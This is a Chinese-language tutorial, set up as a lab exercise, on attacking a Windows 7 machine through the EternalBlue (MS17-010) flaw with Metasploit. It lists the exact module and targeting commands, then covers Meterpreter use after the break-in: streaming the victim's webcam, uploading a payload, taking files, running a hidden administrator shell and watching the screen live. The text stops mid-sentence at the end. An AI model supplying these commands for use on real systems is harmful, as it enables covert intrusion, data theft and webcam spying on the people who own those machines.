准备环境:
1.安装Kali Linux的电脑或虚拟机(可以直接在官网上下载Vmx文件或ova文件)
2.安装有Windows 7 的计算机
准备工作:
1.卸载掉Windows 7的用于永恒之蓝的漏洞修补更新。
2.关闭Windows 7中的所有杀毒软件(例如:360,火绒,卡巴斯基)
实验开始:
1.Kali Linux 中搜索 metasploit framework 双击打开。
2.输入密码(如果是直接在官网上下载的Vmx或ova文件的话,密码默认为kali )
3.等待一会儿,等到加载完成后,输入
use auxiliary/scanner/smb/smb_ms17_010
以使用ms17的漏洞模块。
4.随后输入
use exploit/windows/smb/ms17_010_eternalblue
以使用 ms17_010_eternalblue 模块。
5.回到Windows 7,在cmd中输入ipconfig回车,找到目标机的IP地址(此处为 192.168.0.104 )。
6.在Kali Linux中输入
set rhosts 192.168.0.104
注意:rhosts 后的是你的目标机的IP地址!
7.最后输入
run
开始攻击!
当出现 host is likely VULNERABLE 时说明目标机器有“永恒之蓝”漏洞。
当看见win的时候,说明成功!
注意:如果你看到是下面这个图片:
请检查目标主机的防火墙是否关闭,安全软件是否禁用,如果还是不行,请重启目标主机。
入侵成功:
入侵成功后,你会发现目标主机什么动静都没有。
输入 help 查看一些命令
你会发现有许多你可以做的。
例如:
1.查看系统信息
sysinfo
2.监控摄像头
如果目标主机有摄像头。(或者你是笔记本电脑且使用了虚拟机,则你可以把摄像头连接到虚拟机)
输入命令查看摄像头列表:
webcam_list
输入命令连接摄像头
webcam_stream 1
其中stream后的数字是你在list中要连接的摄像头前的标号。
随后会自动打开浏览器,查看摄像头。保护隐私,所以用白框遮住了。
关闭浏览器,回到终端按ctrl — c 终止继续监控摄像头。
3.上传、下载文件
使用命令上传文件
upload 要上传的文件路径 上传到目标机器的路径
例如
upload /home/kali/Desktop/payload.exe C:\\Users\\Public\\Desktop
注意,要上传的目录路径必须用双重反斜杠 \\ !
可以看到,目标机桌面出现了文件。
使用命令下载文件
download 目标机文件位置路径 Kali下载到的路径
例如:
download C:\\123.txt /home/kali/Desktop
我们发现,Kali Linux桌面上出现了我们想要的文件
4.远程执行 cmd 命令
使用命令打开 cmd
execute -H -i -f cmd.exe
其中,execute表示运行, -H表示是建立隐藏进程(hide) 。
出现了熟悉的cmd界面,而且现在我们拥有管理员权限!
现在可以运行任意命令了,例如cd , tasklist , dir , del 等。
要退出cmd的话只要输入exit即可,如果它问你 Terminate channel xxx ? [y/N] ,输入y后按回车。
5.实时观察目标机在干什么
输入命令
screenshare
成功!
返回终端,按ctrl — c 终止。
6.还有很多命令
还有很多命令,输入 help 查看,后面都有详细的命令解释。
7.退出meterprefer
输入命令
exit
如果要再次控制,输入run即可。
至此,对 Windows 7 攻击成功!
注意:不推荐你一直 exit 再 run 再 exit 再 run ,否则会使得目标机蓝屏。
再次注意
关闭360,火绒等杀毒软件,不然的话:
